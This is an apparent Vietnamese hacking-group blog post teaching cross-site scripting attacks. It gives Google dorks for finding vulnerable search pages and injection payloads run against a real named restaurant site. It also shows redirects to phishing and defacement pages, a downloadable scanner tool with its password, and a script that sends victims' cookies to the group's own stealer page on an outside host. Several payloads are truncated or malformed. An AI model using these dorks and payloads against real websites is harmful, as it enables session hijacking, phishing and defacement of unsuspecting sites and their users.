Phân Loại Lỗ XSS Và Mức Độ Nguy Hiểm

1- XSS là gì ?

XSS( Cross-Site Scripting ) là một trong những kỹ thuật hack website phổ biến nhất hiện nay bằng cách chèn vào url, chèn qua các thanh tìm kiếm hoặc chèn ở bất cứ 1 textbox nào những thẻ HTML hoặc những đoạn mã script nguy hiểm, từ đó chiếm quyền điều khiển của victim hoặc thực hiện những mệnh lệnh mà hacker đưa ra.

2- Nguyên lý hoạt động XSS

Khi website đã bị chèn các thẻ html hay những đoạn mã script nghĩa là đã gửi các request từ máy client đến server nhằm chèn vào đó các thông tin vượt quá tầm kiểm soát của server. Khi người sử dụng click vào những link đó thì toàn bộ cookies, mật khẩu lưu trên trình duyệt được gửi về cho hacker qua email hoặc 1 file nào đó trên host đã được thiết lập từ trước hoặc bị dẫn tới 1 trang fishing mà hacker đã thiết lập từ trước hay bị cài đặt các chương trình virus, Trojan, backdoor trên máy victim tùy vào mệnh lệnh của hacker

3- Phân loại XSS

XSS Có 2 dạng, đó là:
+ Persistent
+ Non-Persistent type

4- Mức độ nguy hiểm XSS

+ Ăn cắp cookies, mật khẩu, cướp session làm việc
+ Cài các loại virus, trojan, backdoor trên máy tính victim
+ Deface website. Tuy nhiên nó chỉ chạy trên trình duyệt phía client và chỉ tấn công vào bề mặt website, không làm thay đổi cấu trúc mã nguồn, cơ sở dữ liệu của website trên server.

5- Phương pháp check site dính lỗ hổng XSS

Bước 1: Sử dụng các dork sau để tìm kiếm trên google

inurlConfusedearch.php?
inurl:find.php?
inurlConfusedearch.html
inurl:find.html
inurlConfusedearch.aspx
inurl:find.aspx
inurl:?keyword=
inurl:?search=

Bước 2: Check lỗi XSS

– Để check 1 site dính lỗi xss, thông thường ta thêm đoạn script sau <script>alert(“XSS”)</script> . Nếu thấy nó xuất hiện 1 khung thông báo thì site đó đã dính lỗi XSS và attacker có thể sử dụng XSS để chiếm quyền điều khiển hay thực thi những mục đích khác.
http://www.liveattheblueolive.com/calend…ript>alert(“Check By Soleil VHB_Group”)</script>
– Tuy nhiên đối với 1 số site cần phải bypass bộ lọc khi thực hiện tấn công bằng XSS. Phần này Soleil sẽ đề cập trong bài sau.
– Ngoài các đoạn mã script attacker cũng có thể chèn vào các thẻ html như sau:
“><body bgcolor=”FF0000”></body>
“><iframe src=”www.vhbgroup.net” height=800 width=800 frameborder=1 align=center></iframe>
– Tool scanner XSS
http://www.mediafire.com/?crdx77ueotbh8u1
Pass download: vhb

6- 1 số thao tác khi tấn công bằng XSS

– Trỏ về 1 trang fishing hoặc 1 hình ảnh deface
http://www.liveattheblueolive.com/calend…t>location=”http://www.ndjsw.gov.cn/soleil.html”;</script>
http://www.liveattheblueolive.com/calend…w.location=”http://np9.upanh.com/b3.s30.d2/75b5d01fec6c8b0e20416cfb65901add_48010539.vhbgroup.png”;</script>
– Chèn ảnh vào nội dung website.
<img src=” http://np9.upanh.com/b3.s30.d2/75b5d01fe…bgroup.png”>
– Chèn 1 video vào nội dung site
<EMBED SRC=”http://vhbgroup.net/soleil.swf”
– Đánh cắp thông tin
<script>alert(document.cookie);</script>
– Đánh cắp cookie:
<script>alert(http://www.vhbgroup.net/stealer.php)</script&gt;
<script>document.location=’www.vhbgroup.net/stealer.php?cookie=’+escape(document.cookie)</script>
Với vhbgroup.net là site của hacker chứa các file thực thi mệnh lệnh và lưu trữ thông tin
http://ducdung08clc.blogspot.com/2013/03…huong.html